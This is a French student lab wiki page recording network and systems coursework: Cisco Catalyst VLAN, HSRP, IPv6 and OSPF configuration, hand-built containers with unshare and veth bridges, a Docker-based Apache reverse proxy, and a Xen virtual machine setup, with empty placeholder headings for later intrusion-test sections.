Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49098</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49098"/>
				<updated>2018-12-21T15:28:09Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.5 Interconnexion avec Internet IPv4 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
